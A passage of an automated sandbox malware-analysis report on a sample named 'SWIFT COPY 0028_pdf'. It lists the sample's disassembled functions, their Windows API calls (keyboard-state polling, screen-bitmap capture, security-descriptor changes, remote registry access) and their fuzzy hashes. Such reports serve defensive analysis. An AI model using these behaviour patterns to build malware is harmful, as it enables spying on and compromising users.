                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0095A8FF
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 0095A910
                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0095A94D
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0095A969
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 0095A986
                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0095A995
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0095A99C
                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0095A9BD
                                                                                    • CopySid.ADVAPI32(00000000), ref: 0095A9C4
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0095A9F5
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0095AA1B
                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0095AA2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3996160137-0
                                                                                    • Opcode ID: 0cde17fa4b7cb5e6e46f602a70d0ad1acef148ab3035faa626024e7a508fb3f7
                                                                                    • Instruction ID: 7c2eca29fe9d1770aea2592ac95aa32c17269b090e594b3f3be0dd309e9087d9
                                                                                    • Opcode Fuzzy Hash: 0cde17fa4b7cb5e6e46f602a70d0ad1acef148ab3035faa626024e7a508fb3f7
                                                                                    • Instruction Fuzzy Hash: 02517071900219AFDF10DF91DD45EEEBBBAFF45301F04821AF912A7290DB349A09DBA5
                                                                                    Function 00979DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 00979E36
                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00979E42
                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00979E4E
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00979E5B
                                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00979EAF
                                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00979EEB
                                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00979F0F
                                                                                    • SelectObject.GDI32(00000006,?), ref: 00979F17
                                                                                    • DeleteObject.GDI32(?), ref: 00979F20
                                                                                    • DeleteDC.GDI32(00000006), ref: 00979F27
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00979F32
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                    • String ID: (
                                                                                    • API String ID: 2598888154-3887548279
                                                                                    • Opcode ID: 197cc933d6ee40e82bdaab2a1f226d4dbf294f78d2f52913c656aada0a8dbe6d
                                                                                    • Instruction ID: 35a60463ee37993c8bfa444b32349f5c735f508714c2a6bdc132634cff0dea4b
                                                                                    • Opcode Fuzzy Hash: 197cc933d6ee40e82bdaab2a1f226d4dbf294f78d2f52913c656aada0a8dbe6d
                                                                                    • Instruction Fuzzy Hash: 11513A76904309EFCB14CFA8CC85EAEBBB9EF49710F14841DF95A97250D735A941CB90
                                                                                    Function 0096CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString__swprintf_wprintf
                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                    • API String ID: 2889450990-2391861430
                                                                                    • Opcode ID: 8d6036a6da767822b87773c089697e3fe30ec0cf2707680c6341042708cf7e93
                                                                                    • Instruction ID: a070c22bd706d0775958e7c379ae07c10438166a3e082ede9406a561c0c3871d
                                                                                    • Opcode Fuzzy Hash: 8d6036a6da767822b87773c089697e3fe30ec0cf2707680c6341042708cf7e93
                                                                                    • Instruction Fuzzy Hash: 25519CB1800119BACB15EBA0DD86FEEB778AF84304F104166F505721A6EB316F99DBA1
                                                                                    Function 0096CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString__swprintf_wprintf
                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                    • API String ID: 2889450990-3420473620
                                                                                    • Opcode ID: b1981e635a11d769fdc5920411ccfacbeff972d1835f8dfb8fa4916f2d04fb5f
                                                                                    • Instruction ID: 7988d67307737a4edc96121e48b57b18f9c6d42d59f96ca48f02e829de3faa7d
                                                                                    • Opcode Fuzzy Hash: b1981e635a11d769fdc5920411ccfacbeff972d1835f8dfb8fa4916f2d04fb5f
                                                                                    • Instruction Fuzzy Hash: 1351CDB1800219AACF14EBE0DD86FEEB778AF84344F104066F505720A2EB746F99DF61
                                                                                    Function 009655BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 009655D7
                                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00965664
                                                                                    • GetMenuItemCount.USER32(009E1708), ref: 009656ED
                                                                                    • DeleteMenu.USER32(009E1708,00000005,00000000,000000F5,?,?), ref: 0096577D
                                                                                    • DeleteMenu.USER32(009E1708,00000004,00000000), ref: 00965785
                                                                                    • DeleteMenu.USER32(009E1708,00000006,00000000), ref: 0096578D
                                                                                    • DeleteMenu.USER32(009E1708,00000003,00000000), ref: 00965795
                                                                                    • GetMenuItemCount.USER32(009E1708), ref: 0096579D
                                                                                    • SetMenuItemInfoW.USER32(009E1708,00000004,00000000,00000030), ref: 009657D3
                                                                                    • GetCursorPos.USER32(?), ref: 009657DD
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 009657E6
                                                                                    • TrackPopupMenuEx.USER32(009E1708,00000000,?,00000000,00000000,00000000), ref: 009657F9
                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00965805
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3993528054-0
                                                                                    • Opcode ID: f67a4c8f8394945b3055c6ce48aa9205ef26b42c375b2c7becf3baa8ceff0d59
                                                                                    • Instruction ID: 2732fea76fbc1d890c0f75137e37bd62cee7251bdf0e6326901e685229a3acc5
                                                                                    • Opcode Fuzzy Hash: f67a4c8f8394945b3055c6ce48aa9205ef26b42c375b2c7becf3baa8ceff0d59
                                                                                    • Instruction Fuzzy Hash: 21710570645A05BFFB209F54CC89FAABF69FF41368F250206F519AA1E1C7B16C10DB90
                                                                                    Function 0095A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0095A1DC
                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0095A211
                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0095A22D
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0095A249
                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0095A273
                                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0095A29B
                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0095A2A6
                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0095A2AB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                    • API String ID: 1687751970-22481851
                                                                                    • Opcode ID: 82ef9e5199b402f5c136dab4beeb5b92a8d5ed83044a791bc3ef1490b80ea11c
                                                                                    • Instruction ID: 7301919ec0cd0bb9dc8117865c6e8732402212068ef55a9a86676f2ecafab18a
                                                                                    • Opcode Fuzzy Hash: 82ef9e5199b402f5c136dab4beeb5b92a8d5ed83044a791bc3ef1490b80ea11c
                                                                                    • Instruction Fuzzy Hash: 8141E976C11229ABDF11EBA4EC85EEDB7B8BF54700F004129F911B7161EB709E15DB90
                                                                                    Function 00983C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00982BB5,?,?), ref: 00983C1D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper
                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                    • API String ID: 3964851224-909552448
                                                                                    • Opcode ID: f87bdf0ddd99b598f85e17addf110493b87cfcefe84774d5b30b6a086a5183ad
                                                                                    • Instruction ID: d7a431478759b31e7f1591d2b50b6bebea3eef3036ae2ca7409144debd40e723
                                                                                    • Opcode Fuzzy Hash: f87bdf0ddd99b598f85e17addf110493b87cfcefe84774d5b30b6a086a5183ad
                                                                                    • Instruction Fuzzy Hash: C7412F3015024A8BDF14FF14E851AEE33A5AF62740F509859FC952B7D6EB74AE0ACB50
                                                                                    Function 009625B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009936F4,00000010,?,Bad directive syntax error,009BDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 009625D6
                                                                                    • LoadStringW.USER32(00000000,?,009936F4,00000010), ref: 009625DD
                                                                                    • _wprintf.LIBCMT ref: 00962610
                                                                                    • __swprintf.LIBCMT ref: 00962632
                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009626A1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                    • API String ID: 1080873982-4153970271
                                                                                    • Opcode ID: ad242e745fc387eabe58b9ef8b21a57453f45efda444b30351b0346576fd9897
                                                                                    • Instruction ID: 451d767f1e85920108029b4b7072738673ae94e669a77796a3ac0a86726df587
                                                                                    • Opcode Fuzzy Hash: ad242e745fc387eabe58b9ef8b21a57453f45efda444b30351b0346576fd9897
                                                                                    • Instruction Fuzzy Hash: 7A21807184022ABFDF11AF90DC0AFEE7B38BF58308F004456F515661A2EA71AA24DB51
                                                                                    Function 00967AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00967B42
                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00967B58
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00967B69
                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00967B7B
                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00967B8C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: SendString
                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                    • API String ID: 890592661-1007645807
                                                                                    • Opcode ID: bfe5485dc383c6f6720c8edf07255fcf7601284fddcfbe32c9600d9cbf194a86
                                                                                    • Instruction ID: c9aa301a880822546ad1752726a8a8002ed7a002bcde93fed1df0f606aff46f6
                                                                                    • Opcode Fuzzy Hash: bfe5485dc383c6f6720c8edf07255fcf7601284fddcfbe32c9600d9cbf194a86
                                                                                    • Instruction Fuzzy Hash: D911C4F069026979E720B7B1DC4AEFFBB7CEBD1B04F00452A7411A31D5DA604A44C5B1
                                                                                    Function 0096778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • timeGetTime.WINMM ref: 00967794
                                                                                      • Part of subcall function 0093DC38: timeGetTime.WINMM(?,7694B400,009958AB), ref: 0093DC3C
                                                                                    • Sleep.KERNEL32(0000000A), ref: 009677C0
                                                                                    • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 009677E4
                                                                                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00967806
                                                                                    • SetActiveWindow.USER32 ref: 00967825
                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00967833
                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00967852
                                                                                    • Sleep.KERNEL32(000000FA), ref: 0096785D
                                                                                    • IsWindow.USER32 ref: 00967869
                                                                                    • EndDialog.USER32(00000000), ref: 0096787A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                    • String ID: BUTTON
                                                                                    • API String ID: 1194449130-3405671355
                                                                                    • Opcode ID: a5be56dd08d48d9eea312e024f4ef544d002f3f47be11023b5a9ae52f6e0bac5
                                                                                    • Instruction ID: ff471d75a4a0c8e00faca3617162436e3d94cf18cb58baa328cb0a99f3fe97d0
                                                                                    • Opcode Fuzzy Hash: a5be56dd08d48d9eea312e024f4ef544d002f3f47be11023b5a9ae52f6e0bac5
                                                                                    • Instruction Fuzzy Hash: E92158B022D245BFE7045BA0ECCDF2A7F6AFB45349F44A064F50687662CB618D00FAA0
                                                                                    Function 009702EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
                                                                                      • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
                                                                                    • CoInitialize.OLE32(00000000), ref: 0097034B
                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009703DE
                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 009703F2
                                                                                    • CoCreateInstance.OLE32(009ADA8C,00000000,00000001,009D3CF8,?), ref: 0097043E
                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009704AD
                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00970505
                                                                                    • _memset.LIBCMT ref: 00970542
                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0097057E
                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009705A1
                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 009705A8
                                                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 009705DF
                                                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 009705E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                    • String ID:
                                                                                    • API String ID: 1246142700-0
                                                                                    • Opcode ID: 5bf5538106e490dd0b4537c41f62c7c460de23cb9a6d892346ec5f22da0a5564
                                                                                    • Instruction ID: 627504a13093513c6251574d40a7e7797858f2bbd936592e4ef640876b3addb2
                                                                                    • Opcode Fuzzy Hash: 5bf5538106e490dd0b4537c41f62c7c460de23cb9a6d892346ec5f22da0a5564
                                                                                    • Instruction Fuzzy Hash: 46B1C875A00119EFDB04DFA4C888EAEBBB9FF89304B148459F90AEB251D730EE41CB50
                                                                                    Function 00962E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?), ref: 00962ED6
                                                                                    • SetKeyboardState.USER32(?), ref: 00962F41
                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00962F61
                                                                                    • GetKeyState.USER32(000000A0), ref: 00962F78
                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00962FA7
                                                                                    • GetKeyState.USER32(000000A1), ref: 00962FB8
                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00962FE4
                                                                                    • GetKeyState.USER32(00000011), ref: 00962FF2
                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 0096301B
                                                                                    • GetKeyState.USER32(00000012), ref: 00963029
                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00963052
                                                                                    • GetKeyState.USER32(0000005B), ref: 00963060
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: State$Async$Keyboard
                                                                                    • String ID:
                                                                                    • API String ID: 541375521-0
                                                                                    • Opcode ID: 037302aec01a8e7af922673a75782f7ab568b284e976d1e1d95ee19202874b85
                                                                                    • Instruction ID: de552b3c7b75f6e28c0faae8043597022572b010b89b1951ce22377bd8df22f6
                                                                                    • Opcode Fuzzy Hash: 037302aec01a8e7af922673a75782f7ab568b284e976d1e1d95ee19202874b85
                                                                                    • Instruction Fuzzy Hash: 1C51FA24A08BC429FB35DBB489107EEBFF85F12344F08859ED5C25A5C2DB549B8CC7A2
                                                                                    Function 0095ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,00000001), ref: 0095ED1E
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0095ED30
                                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0095ED8E
                                                                                    • GetDlgItem.USER32(?,00000002), ref: 0095ED99
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0095EDAB
                                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0095EE01
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0095EE0F
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0095EE20
                                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0095EE63
                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0095EE71
                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0095EE8E
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0095EE9B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
